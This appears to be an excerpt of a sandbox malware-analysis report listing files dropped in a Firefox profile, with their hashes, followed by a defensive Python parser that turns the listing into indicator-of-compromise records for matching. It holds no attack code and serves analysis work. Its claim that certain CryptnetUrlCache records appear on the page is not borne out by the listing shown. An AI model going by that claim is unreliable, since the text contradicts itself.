C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\datareporting\glean\db\data.safe.bin
Filesize 9KB
MD5 df7b0616f49d47eeb78dc8e176b3353c
SHA1 fbf489edacf598d86716e211c7bce2f15aa67066
SHA256 ea88d7e768b193ec352bbb09e892118b940c93d63bb998d6856e83309013d07e
SHA512 92191877eb3712284f8e2c9ba2e260d8cc3f26be99c3b94ff4d1c97d359ddde18430ffa414cff903d75620faf10d7de393355e8abbc1fdb30615158ec66549ce
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\datareporting\glean\pending_pings\981b9c5b-dca0-4978-b379-0798f72bc565
Filesize 733B
MD5 68cb6e7d79c99c41660666ca8c79aba2
SHA1 1d19981c7da632d2e59d71eb932ff188d3e0f852
SHA256 4ca9c37315c39f7af1db15d87a8188c4fa134b073ec4e41b151e046a598e56ec
SHA512 a01d84beb72c6c3894e70d0249ecf9df2883fc4f9d532a4158f8bf0c6e1ea9d5f59ee8060a9cdc6597a629c039361b360111901fc3fc4e1430349a38fcd73bb3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll
Filesize 997KB
MD5 fe3355639648c417e8307c6d051e3e37
SHA1 f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA256 1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA512 8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info
Filesize 116B
MD5 3d33cdc0b3d281e67dd52e14435dd04f
SHA1 4db88689282fd4f9e9e6ab95fcbb23df6e6485db
SHA256 f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
SHA512 a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt
Filesize 479B
MD5 49ddb419d96dceb9069018535fb2e2fc
SHA1 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA256 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA512 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json
Filesize 372B
MD5 8be33af717bb1b67fbd61c3f4b807e9e
SHA1 7cf17656d174d951957ff36810e874a134dd49e0
SHA256 e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd
SHA512 6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll
Filesize 11.8MB
MD5 33bf7b0439480effb9fb212efce87b13
SHA1 cee50f2745edc6dc291887b6075ca64d716f495a
SHA256 8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e
SHA512 d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib
Filesize 1KB
MD5 688bed3676d2104e7f17ae1cd2c59404
SHA1 952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA256 33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA512 7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig
Filesize 1KB
MD5 937326fead5fd401f6cca9118bd9ade9
SHA1 4526a57d4ae14ed29b37632c72aef3c408189d91
SHA256 68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81
SHA512 b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2
-
Filesize 7KB
MD5 4e3c63f41e2f733322d0092e24be8c6f
SHA1 09babc35152a5210a7f8ad5b8e2107daafbc8b46
SHA256 312f76e9392af4c0616f7f17fbcc0c8eec10a0b2805e81dccfcb90b0634d8a6f
SHA512 39557b43858234087ee6a3f145e4cc55209ee533709077003ce4d9fe709d58a1d19ef21b98e1ece39fbe924600f0bf2e11c7daf6c3293846a0abe98be06e6eef
-
Filesize 6KB
MD5 9f29e70398ef2fc1b1bfdc40b8863f2d
SHA1 834e65eef6c86ba08c98f3b7d4ec363c4462dad6
SHA256 dd5502ef3d395d95a0899c3dbdd02a9a6f787597b5b5d81a9b66f312a438b3db
SHA512 e77d461d237ef55b52664ca9320384efb5d641f2a8f3cceb7b70264a36b52ddbec359325725460fd9ed2ab7c0c829c2ac157d27ff451c89c2377780b10c76e0d
-
Filesize 7KB
MD5 44897475f4213ac9bf92ad9d0a317772
SHA1 6dfe3e96df845762c9e20efd5596e1ae0eaeaa79
SHA256 81f48b4f5112b9416568eae0e4f99a9d9a146cbd54592675d6e6fb23f234536b
SHA512 b06f2253199794a6ceddf5850e7d93a995342dfceebb97b60d00baa0cd1be5fff8a703760dee975c52e4ddee2d22bfdb834f5d3bf9eec311d7173d3191b0a24d
-
Filesize 6KB
MD5 a3bcc4b96702afe4215eb5728431b53c
SHA1 c25689062ec97bf932d41ec932780463b0c1ee2d
SHA256 0cd8d490b547cb99ca8d8ee5ed8421da0c0b75278e7c2f8e518614d329b425a8
SHA512 b75f5223721be99358083d23b17a7472a987a77a94d93460d3598d6b9c049763fa699a53f2fc8edefbaaad23396c26feffffc7f95970172cfbfc89d3ea8a120e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\sessionstore-backups\recovery.jsonlz4
Filesize 4KB
MD5 5ae0538ba565afdcae62bfe4523bfee9
SHA1 476fa675e205eb3723d929d4b07d497f7e0bb0d2
SHA256 360324ced057930c703549567b11b805fbf50791f3f6097cfdd1de4c6de4f1bd
SHA512 411e7c7328514a5900678b985f6de70f143f1b8cf63ce4f99a2086cee9d9919bef6ccce441ea42f49d27f34af4dc862fec182dbcac5089c03a4f37d1e71e4b09
-
Filesize 1.8MB
MD5 8c46fe8eee484e73651be335c8ee5e84
SHA1 9d9b074b985584f45cb6c7a620970dc6a599fb72
SHA256 8863fb5e08bc5fe36263d7e0c34f14aa6102526a891a972ee2dc0ac5f6708619
SHA512 e2ccec1c15c1d380000afacb0d0755aa25fb2964bfc62d0317f66271dd10964f4f3a02158878da794b99d18c2649b83a0b38387114962becd776234f39e289d3
-
Filesize 925KB
MD5 62d09f076e6e0240548c2f837536a46a
SHA1 26bdbc63af8abae9a8fb6ec0913a307ef6614cf2
SHA256 1300262a9d6bb6fcbefc0d299cce194435790e70b9c7b4a651e202e90a32fd49
SHA512 32de0d8bb57f3d3eb01d16950b07176866c7fb2e737d9811f61f7be6606a6a38a5fc5d4d2ae54a190636409b2a7943abca292d6cefaa89df1fc474a1312c695f
-
Filesize 63KB
MD5 b58b926c3574d28d5b7fdd2ca3ec30d5
SHA1 d260c4ffd603a9cfc057fcb83d678b1cecdf86f9
SHA256 6e70b56d748c4ccab13cc8a055d3795ea0dd95fe3b70568d7d3ac0c6621140a3
SHA512 b13cb998822b716b695013bcd6dec62a2290567d0d1743b2d982ca084235cf69c6ea1fc91c9d4e62657c6f9e102c7c60e81296ab055ffe43b887c5f8ec8958ab
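The dropped-file listing above is only usable as an IOC set once each label is separated from its digest, each digest is checked for a sane length, and the records that share a path (the CryptnetUrlCache MetaData entry is reported four times with different content) are all kept. The following is an added example, not code from the report or from tria.ge: it parses an excerpt of this page's listing (SAMPLE, two records copied from above, one in the spaced form and one in the fused form that text extraction produces), indexes every digest, and matches arbitrary data against the set, confirming a hit on SHA256 only. TARGET, the record names used in the demonstration, and the file names passed to FileRecord are constructed for the example.

```python
"""Parse a tria.ge 'Files' listing into IOC records and match data against it.
Added example, not part of the original report and not tria.ge's own code.
SAMPLE is an excerpt of this page's listing; TARGET is constructed bytes."""
import hashlib
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
# Extraction may fuse label and value ("MD59af85...") or split them across
# lines ("Filesize" / "107KB"); the regex plus the 'pending' state cover both.
LABEL_RE = re.compile(r"^(SHA512|SHA256|SHA1|MD5|Filesize)\s*:?\s*(\S*)$")
HEX_RE = re.compile(r"^[0-9a-f]+$")

SAMPLE = r"""
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 344B
MD5 9af85baf30efecc62cad39c6f0fb0496
SHA1 4059278c943dd3676cec2742ba4b7665328f8fac
SHA256 eb7b2d18d7a0d71c22fd01bda78e4fd86b77ca4cb67ecda174f54174bf86031a
SHA512 ee741a8d03489b017e3a1a272ca448dc9db1572116ffaeb1e07a3f9d6849895177794bc6f9f97128d5242d92187a3bbdb850c9bb9b3f002edd580fa0edd98982
-
Filesize
107KB
MD574c5934b5ec8a8907aff69552dbaeaf7
SHA124c6d4aa5f5b229340aba780320efc02058c059c
SHA25695930b643e2d7d09d9cdfb2776534744ebb101347bbfe8be84f376fa15d8033a
SHA512d458c23826d76fecf28ea791a10dda381737d19a1a3a3ba519da6b83f47867f25c51ab34c6cdc73b03b45f6e08bf3bac15172a23847a91d2d76031441859056a
"""
TARGET = b"constructed bytes, not one of the files in the report"


@dataclass
class FileRecord:
    path: Optional[str] = None   # None when the report did not record a path
    size: Optional[str] = None
    hashes: Dict[str, str] = field(default_factory=dict)


def _assign(rec: FileRecord, label: str, value: str) -> None:
    if label == "Filesize":
        rec.size = value
        return
    value = value.lower()
    # A wrong length means the label/value split went wrong; refuse rather
    # than load a truncated digest into the IOC set.
    if len(value) != HASH_LEN[label] or not HEX_RE.match(value):
        raise ValueError(f"bad {label} value {value!r}")
    rec.hashes[label] = value


def parse_listing(text: str) -> List[FileRecord]:
    records: List[FileRecord] = []
    cur, pending = FileRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "-":                  # record separator
            if cur.path or cur.hashes:
                records.append(cur)
            cur, pending = FileRecord(), None
            continue
        if pending:                      # value split onto its own line
            _assign(cur, pending, line)
            pending = None
            continue
        m = LABEL_RE.match(line)
        if m:
            label, value = m.groups()
            if value:
                _assign(cur, label, value)
            else:
                pending = label
        elif cur.path is None and ("\\" in line or "/" in line):
            cur.path = line
        else:
            raise ValueError(f"unrecognised line: {line!r}")
    if cur.path or cur.hashes:
        records.append(cur)
    return records


def build_index(records: List[FileRecord]) -> Dict[tuple, List[FileRecord]]:
    """(algorithm, digest) -> records. One path can appear several times with
    different content, so every record is kept instead of the last one winning."""
    index: Dict[tuple, List[FileRecord]] = {}
    for rec in records:
        for algo, digest in rec.hashes.items():
            index.setdefault((algo, digest), []).append(rec)
    return index


def digests(data: bytes) -> Dict[str, str]:
    return {name: getattr(hashlib, name.lower())(data).hexdigest()
            for name in HASH_LEN}


def match(index, data: bytes):
    """Confirm a hit on SHA256 only; an MD5- or SHA1-only hit is returned as
    'weak' because those digests are collision-prone."""
    d = digests(data)
    strong = index.get(("SHA256", d["SHA256"]), [])
    weak = [a for a in ("MD5", "SHA1") if (a, d[a]) in index]
    return strong, weak


if __name__ == "__main__":
    idx = build_index(parse_listing(SAMPLE))
    print(len(idx), "digests indexed;", match(idx, TARGET))
```

The parser treats the separator line and the label set as the grammar and rejects anything else, so a mangled line fails loudly instead of silently producing a record with a missing digest. Keying the index on the (algorithm, digest) pair rather than on path is what makes the four CryptnetUrlCache records usable: they are four distinct IOCs that happen to share a name.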